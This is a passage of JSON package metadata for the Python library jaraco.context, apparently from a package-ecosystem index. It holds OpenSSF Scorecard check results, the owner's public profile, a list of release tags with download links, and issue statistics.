ackaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"jaraco","name":"Jason R. Coombs","uuid":"308610","kind":"user","description":"","email":"jaraco@jaraco.com","website":"https://www.jaraco.com","location":"Pittsburgh, PA, USA","twitter":"jaraco","company":null,"icon_url":"https://avatars.githubusercontent.com/u/308610?u=5b3fdef94d1b0ac7392d17643eaba029f5f13bea\u0026v=4","repositories_count":233,"last_synced_at":"2026-08-06T04:39:36.850Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/jaraco","funding_links":["https://github.com/sponsors/jaraco"],"total_stars":5439,"followers":746,"following":5,"created_at":"2022-11-02T16:21:31.721Z","updated_at":"2026-08-06T04:39:37.156Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco/repositories"},"tags":[{"name":"v6.1.2","sha":"098f39c911d4504b2c718f2ff483ae24f1c4d378","kind":"tag","published_at":"2026-03-20T22:10:56.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2/manifests"},{"name":"v6.1.1","sha":"47979d7b6a55353170f61f3e54d17f5973cb8e1c","kind":"tag","published_at":"2026-03-07T15:43:22.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1/manifests"},{"name":"v6.1.0","sha":"675aaf5bfb926bdafcded1b0e08ca011d6e0f599","kind":"tag","published_at":"2026-01-13T02:49:19.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0/manifests"},{"name":"v6.0.2","sha":"1fe5de1e450556cc68d1d33198f8c7b8791af42d","kind":"tag","published_at":"2025-12-24T19:18:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2/manifests"},{"name":"v6.0.1","sha":"088151eb92eaf8801d027e126d4f7a262e422424","kind":"tag","published_at":"2024-08-20T03:35:36.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1/manifests"},{"name":"v6.0.0","sha":"d892f531d6707f46ef1981f5ca7a7309ed4d3005","kind":"tag","published_at":"2024-07-26T21:08:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0/manifests"},{"name":"v5.3.0","sha":"e0e9224b3dbe6520c986bf41820f882160dd55ab","kind":"tag","published_at":"2024-04-06T22:57:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0/manifests"},{"name":"v5.2.0","sha":"c23c888c869bfb693246f69ba512aaede5b0438b","kind":"tag","published_at":"2024-04-06T14:42:52.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"0a1e1492aef2455f60f9b4f364551f0b4926da41","kind":"tag","published_at":"2024-04-04T23:18:01.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"eb865a132d3f801335f8b46b4de2d64d4e16e4b4","kind":"tag","published_at":"2024-04-04T18:56:02.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0/manifests"},{"name":"v4.3.0","sha":"0e0ae08919b984e3c7cffdb2106e437d0d0891c8","kind":"tag","published_at":"2023-01-19T15:28:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"7e22446a66f13140c0cfc7df3f36c162f11f3b5a","kind":"tag","published_at":"2023-01-18T18:06:43.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"5bf0042ef434aa8924a771a405ae29e4c0110c1e","kind":"tag","published_at":"2022-11-19T03:06:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0/manifests"},{"name":"v4.1.2","sha":"c3a9b7393ed9479dab7b02a44242ae2b017c4933","kind":"tag","published_at":"2022-07-14T05:04:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"4d09b48ade8acc32e3453da928ad1eec5158a5a0","kind":"tag","published_at":"2021-10-31T17:18:09.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"866a1b35d416ca6855f2d068072af53cbf255cc3","kind":"tag","published_at":"2021-10-31T17:08:46.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0/manifests"},{"name":"v4.0.0","sha":"23d17bf1f04b83ef34c8cd0e67d26c2e323f5a58","kind":"tag","published_at":"2021-01-29T02:38:28.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0/manifests"},{"name":"v3.0.0","sha":"e2bb8bd3fe8b3b3ed4a50c4a9f4f1998739bf276","kind":"tag","published_at":"2020-01-10T08:35:45.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v3.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v3.0.0/manifests"},{"name":"2.0","sha":"105f81a6204d3a9fbb848675d62be4ef185f36f2","kind":"tag","published_at":"2019-01-01T15:40:50.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/2.0/manifests"},{"name":"1.8","sha":"193b5a60581b5a63c3d955e002319f114f9a7c8b","kind":"tag","published_at":"2018-11-08T16:42:27.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.8","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.8/manifests"},{"name":"1.7","sha":"d7866113d8d79a541c1f87e2eae975d23d2500ba","kind":"tag","published_at":"2017-11-28T19:27:39.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.7","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.7/manifests"},{"name":"1.6.1","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:32:35.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6.1/manifests"},{"name":"1.6","sha":"94f59b63bd5b2f634f0f8061402a884e108153fa","kind":"tag","published_at":"2017-03-21T03:19:34.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.6","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.6/manifests"},{"name":"1.5.2","sha":"9660d84625f7d27f47f23bd33a1e88c6c59c5384","kind":"commit","published_at":"2015-10-30T15:02:08.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.2/manifests"},{"name":"1.5.1","sha":"51add8c320bb1869d339ddb5d3e0b0df5185b431","kind":"commit","published_at":"2015-10-30T15:02:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5.1/manifests"},{"name":"1.5","sha":"df1e66e6ff30ee0622b1eb822a4d2ba1663b4ba5","kind":"commit","published_at":"2015-10-30T13:32:37.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.5","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.5/manifests"},{"name":"1.4","sha":"41a57fcc069952a9925b0ac44d66317d679b8e01","kind":"commit","published_at":"2015-10-30T12:59:05.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.4","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.4/manifests"},{"name":"1.3","sha":"89a04a5a4b02f92546eb2bc2bd254dabbd148359","kind":"commit","published_at":"2015-02-22T20:18:53.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.3","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.3/manifests"},{"name":"1.2","sha":"a3363e1918bab3d2b260179f229706296509c1c0","kind":"commit","published_at":"2015-02-16T00:58:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.2/manifests"},{"name":"1.1","sha":"115a8978616e766daace2e0cd50c5db437f3785e","kind":"commit","published_at":"2014-06-17T18:32:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.1/manifests"},{"name":"1.0","sha":"d5be3e1a933b97068f31930f3eeb210895d145e9","kind":"commit","published_at":"2014-02-16T08:42:48.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/1.0/manifests"}]},"repo_metadata_updated_at":"2026-08-06T19:26:18.676Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-jaraco.context-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.22","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-jaraco.context-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-jaraco.context-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-jaraco.context-pyc/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context","https://github.com/sponsors/jaraco"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null